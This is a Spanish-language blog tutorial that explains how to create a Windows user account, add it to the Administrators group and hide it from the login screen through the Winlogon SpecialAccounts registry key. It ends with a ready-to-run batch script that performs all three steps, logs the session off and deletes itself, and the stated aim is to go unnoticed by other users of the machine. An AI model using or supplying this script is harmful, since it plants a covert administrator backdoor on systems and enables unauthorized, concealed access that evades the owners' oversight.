Cuentas invisibles en Windows

Muchas veces cuando intentamos crear una cuenta en cualquier S.O. Windows (ya sea personal o temporal dependiendo el equipo donde se aloje) lo ideal es pasar desapercibidos ante cualquier otro usuario, pero Wow! ¿Qué rayos sucede cuando creamos nuestra cuenta e intentamos iniciar sesión..? Si señor… esa es la respuesta… se puede observar la cuenta recién creada como una de las opcionadas para loguearse… Bueno aquí se hará una pequeña referencia de algunos comandos importantes para hacer toda la operación, desde crear el usuario hasta ocultarlo simplemente con 3 lineas de código en un archivo BATCH (.BAT)

Justificación

– La idea es dejar de usar el sistema de ventanas X window y pasar a otro paralelo de uso comandos desde la consola – prompt. También conocer ciertos comandos que pueden ser muy útiles cuando se manejan los parámetros adecuados.

En la practica

1. Creando nuestro usuario

– Para crear nuestro usuario se debe tener presente que debemos tener una cuenta de root [Administrador] o usuario avanzado… Para crear una cuenta desde la consola es tan simple como  ingresar el comando net user.. con la siguiente estructura.

net user usuario clave /Add 

* La clave es opcional. si no se ingresa queda en blanco cuando se inicie sesion

2. Adicionando nuestro usuario a un grupo

– El siguiente paso después de crear nuestro usuario es adicionarlo a un grupo, ya que por defecto queda como invitado/usuario normal. Para poder realizar esta operación desde la consola,  simplemente debemos usar el comando net localgroup el cual contiene el listado de los grupos del sistema [influye el idioma del SO] y permite realizar tareas con un usuario en especial en este caso sera el usuario que hayamos creado.

*Esta es la salida que retornaría nuestro comando normalmente

C:\Documents and Settings\cocoman>net localgroup
Aliases for \\cocoman
------------------------------------------------
*Administrators
*Backup Operators
*Guests
*HelpServicesGroup
*Network Configuration Operators
*Power Users
*Remote Desktop Users
*Replicator
*Users
The command completed successfully.
net localgroup administradores usuario /Add

*En este ejemplo mi usuario quedó en el grupo de administradores (El idioma del Sistema operativo para este caso es español.)

*Se debe tener en cuenta que para hacer este cambio, debemos tener también privilegio de administrador.

3. Volviendo a nuestro usuario invisible, ahora sí

– Esta parte se maneja a través del regedit (Editor del registro de Windows) modificando la siguiente clave.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList

y adicionando el usuario a volver invisible, pero para que llamar al regedit si podemos hacerlo todo desde nuestra consola.

Bueno solo con teclear lo siguiente, nuestro usuario quedará invisible en el inicio de sesión.

reg add "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList"  /v Usuario /t REG_DWORD /d 0

Aquí hemos creado una clave con valor  DWORD y le hemos asignado el valor cero, el cual da la propiedad de invisibilidad en el inicio de sesion…

La parte final

Bueno pues como lo prometido es deuda ahora este es código que nos permitira en resumidas lineas hacer todo lo que se explicaba durante este pequeño lab.

Funcionamiento :

1. En una consola de DOS invoca/llama/Ejecuta al bat esperando 2 parámetros.
1.1 El primero corresponde al nombre de usuario que será creado en el sistema
1.2 El segundo corresponde a la clave que tendra el usuario para iniciar sesión
2. Listo ahora solo es probar.

@Echo off
rem * Nota: Recomedable llamar al archivo user.bat para eliminarlo automaticamente antes de que
rem * se apague el pc.
rem * Este Bat funciona a partir de dos parametros.
rem * 1. define el nombre de usuario con el cual quedara registrado en el sistema.
rem * 2. define la clave de inicio de sesion para el usuario
rem * Aqui creamos nuestro usuario partiendo de los parametros asignados al momento de invovar el bat
@net user %1 %2 /add
rem * Aqui agrego al usuario al grupo de admnistradores de la maquina. Se debe tener en cuenta el idioma de windows
rem * ya que en las versiones en ingles el nombre cambia por administrators
@net localgroup administradores %1 /add
rem * Agrego mi usuario asignandole la ruta en el regedit que contiene las cuentas especiales y creo un nuevo valor
rem * de tipo DWORD con valor 0, para asignarle la propiedad e invisibiidad..
@reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"  /v %1 /t REG_DWORD /d 0
rem * Listo ahora todo sera consumado :P
rem * cierro mi sesion
shutdown -l
del user.bat

¿Ahora como inicio sesión con mi usuario?

* Para poder seleccionar al usuario que hemos creado simplemente pulsando la combinación de teclas [CTRL + ALT + SUPR] en el  inicio de sesión se abrirá una nueva ventana donde ingresaremos el nombre de usuario y la contraseña (si tiene contraseña).

PTA: Cualquier duda referente de los comandos simplemente con colocar el comando en la consola y escribir a continuación /? aparecerá la descripción y funcionamiento de cada comando

PTA2: Como diría Adrian Lamo, cuando todo falla el manual tiene la solución… si quieren pueden consultar la ayuda de Windows con la descripción de cada comando, con referencias rápidas y ejemplos de su uso.

PTA: Cualquier inconveniente con este lab. por favor reportarlo.

Por DMK
Hakuna Matata!

Deja un comentario

Your email address will not be published. Required fields are marked *

You may use these <abbr title="HyperText Markup Language">HTML</abbr> tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>